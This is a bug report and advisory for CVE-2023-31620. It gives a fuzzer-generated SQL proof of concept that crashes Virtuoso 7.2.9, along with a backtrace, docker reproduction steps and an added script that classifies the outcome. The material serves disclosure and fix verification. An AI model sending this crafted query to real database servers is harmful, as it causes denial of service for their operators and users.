CVE-2023-31620: virtuoso 7.2.9 crashed at dv_compare · Issue #1128 · openlink/virtuoso-opensource

An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE element ( name VARCHAR(80), test1 VARCHAR(80), f1 VARCHAR(80), f2 VARCHAR(80), code INTEGER, t1 VARCHAR(80), a VARCHAR(80), example VARCHAR(80), b VARCHAR(80), c VARCHAR(80), folders VARCHAR(80) );
INSERT INTO element(b,b) VALUES(38,1444);
SELECT (select ( -count(distinct case case code when b then c*case when b<=element.b+b then code
    when (abs(element.c)/abs(case when b-coalesce((select max(element.c-element.b) from element
    where not exists(select 1 from element where 17 in (b,13,(b)) or b in (b,c,element.b))),element.b)
    not in (b,(c),element.b) then -19 when c between code and 13 then 19 else element.c end))=13
    then c else 13 end else 17 end when 13 then element.c else element.b end-element.c)) from element)
FROM element
WHERE coalesce((select max(element.b) from element where element.c<>element.c-13),element.code)>=b
   or b*coalesce((select max((b)) from element where c not between +coalesce((select max(13) from element
    where b between -(abs(( -coalesce((select max(case c when element.c then b else -element.c end)
    from element where 11>b and element.b<element.b),element.c)))/abs(b)) and b),code) and element.b),element.b)* -19
    not between (17) and element.c and (element.b<=code);

backtrace:

#0 0x60afab (dv_compare+0x3b)
#1 0xc278fb (cmp_vec_any+0x24b)
#2 0xc28caa (cmp_vec+0x12ba)
#3 0x751b48 (code_vec_run_v+0x1368)
#4 0x7ac72d (qn_send_output+0xbd)
#5 0x7ac43e (qn_input+0x3ce)
#6 0x7ac8a6 (qn_send_output+0x236)
#7 0x81e26d (set_ctr_vec_input+0x94d)
#8 0x7ac43e (qn_input+0x3ce)
#9 0x74f268 (subq_next+0x258)
#10 0x81cfa2 (ins_vec_subq+0x2a2)
#11 0x75119b (code_vec_run_v+0x9bb)
#12 0x7b5a9b (end_node_input+0x13b)
#13 0x7ac43e (qn_input+0x3ce)
#14 0x7acb6f (qn_ts_send_output+0x23f)
#15 0x7b247e (table_source_input+0x16ee)
#16 0x7ac43e (qn_input+0x3ce)
#17 0x7b9c3b (fun_ref_node_input+0x36b)
#18 0x7ac43e (qn_input+0x3ce)
#19 0x7ac8a6 (qn_send_output+0x236)
#20 0x81e26d (set_ctr_vec_input+0x94d)
#21 0x7ac43e (qn_input+0x3ce)
#22 0x74f268 (subq_next+0x258)
#23 0x81cfa2 (ins_vec_subq+0x2a2)
#24 0x75119b (code_vec_run_v+0x9bb)
#25 0x7b5a9b (end_node_input+0x13b)
#26 0x7ac43e (qn_input+0x3ce)
#27 0x7acb6f (qn_ts_send_output+0x23f)
#28 0x7b247e (table_source_input+0x16ee)
#29 0x7ac43e (qn_input+0x3ce)
#30 0x7b9c3b (fun_ref_node_input+0x36b)
#31 0x7ac43e (qn_input+0x3ce)
#32 0x7ac8a6 (qn_send_output+0x236)
#33 0x81e26d (set_ctr_vec_input+0x94d)
#34 0x7ac43e (qn_input+0x3ce)
#35 0x74f268 (subq_next+0x258)
#36 0x81cfa2 (ins_vec_subq+0x2a2)
#37 0x75119b (code_vec_run_v+0x9bb)
#38 0x7b5a9b (end_node_input+0x13b)
#39 0x7ac43e (qn_input+0x3ce)
#40 0x7acb6f (qn_ts_send_output+0x23f)
#41 0x7b247e (table_source_input+0x16ee)
#42 0x7ac43e (qn_input+0x3ce)
#43 0x7ac8a6 (qn_send_output+0x236)
#44 0x81e26d (set_ctr_vec_input+0x94d)
#45 0x7ac43e (qn_input+0x3ce)
#46 0x7bdc6e (qr_exec+0x11ee)
#47 0x7cb446 (sf_sql_execute+0x11a6)
#48 0x7cbf4e (sf_sql_execute_w+0x17e)
#49 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#50 0xe1f01c (future_wrapper+0x3fc)
#51 0xe2691e (_thread_boot+0x11e)
#52 0x7f731e31d609 (start_thread+0xd9)
#53 0x7f731e0ed133 (clone+0x43)

Ways to reproduce (write the PoC to the file '/tmp/test.sql' first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9

wait for the server to start

sleep 10

check whether the simple query works

echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

run the PoC

docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
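The steps above leave the reader to judge by eye whether the server died. The script below is an added example (not from the issue or the Virtuoso project) that wraps the same docker/isql steps, replaces the fixed sleep with a readiness poll, and reports a verdict after the PoC runs, so the same run can confirm an affected build or verify that a patched image survives. It assumes docker on the host, the PoC at /tmp/test.sql as in the report, and the image tag from the report unless IMAGE is overridden.

```shell
#!/usr/bin/env bash
# Added example: reproduce CVE-2023-31620 report steps and classify the outcome.
# Assumes docker, /tmp/test.sql, and the image tag named in the report.
set -u

IMAGE="${IMAGE:-openlink/virtuoso-opensource-7:7.2.9}"   # override to test a fixed build
NAME="${NAME:-virtdb_test}"
POC="${POC:-/tmp/test.sql}"

# Run one statement through isql inside the container; exit status only.
isql_ok() {
  printf '%s\n' "$1" | docker exec -i "$NAME" isql 1111 dba >/dev/null 2>&1
}

# Poll until SELECT 1 answers instead of trusting a fixed "sleep 10".
wait_ready() {
  tries="${1:-30}"
  while [ "$tries" -gt 0 ]; do
    isql_ok 'SELECT 1;' && return 0
    sleep 2; tries=$((tries - 1))
  done
  return 1
}

# Is the server process still alive according to docker? Prints true/false.
container_running() {
  docker inspect -f '{{.State.Running}}' "$NAME" 2>/dev/null || echo false
}

# Pure verdict logic (no docker needed):
#   $1 = container running after the PoC (true/false)
#   $2 = exit status of "SELECT 1" after the PoC (0 = answered)
verdict() {
  if [ "$1" != "true" ]; then echo "CRASH: server process exited (DoS reproduced)"
  elif [ "$2" -ne 0 ]; then echo "UNRESPONSIVE: process alive but isql no longer answers"
  else echo "SURVIVED: server still answers queries (not reproduced on $IMAGE)"
  fi
}

main() {
  docker container rm "$NAME" -f >/dev/null 2>&1 || true
  docker run --name "$NAME" -itd --env DBA_PASSWORD=dba "$IMAGE" >/dev/null
  wait_ready || { echo "server never became ready"; exit 2; }
  docker exec -i "$NAME" isql 1111 dba < "$POC" >/dev/null 2>&1 || true  # an error exit here is expected
  sleep 2                      # give a dying process time to disappear
  isql_ok 'SELECT 1;'; after=$?
  verdict "$(container_running)" "$after"
}

# Only touch docker when asked explicitly:  ./repro.sh run
[ "${1:-}" = "run" ] && main
```

The verdict distinguishes a process that exited (the crash in the backtrace) from one that merely returned an error for the statement, which is the difference between an affected and a fixed build.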

Related news

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.
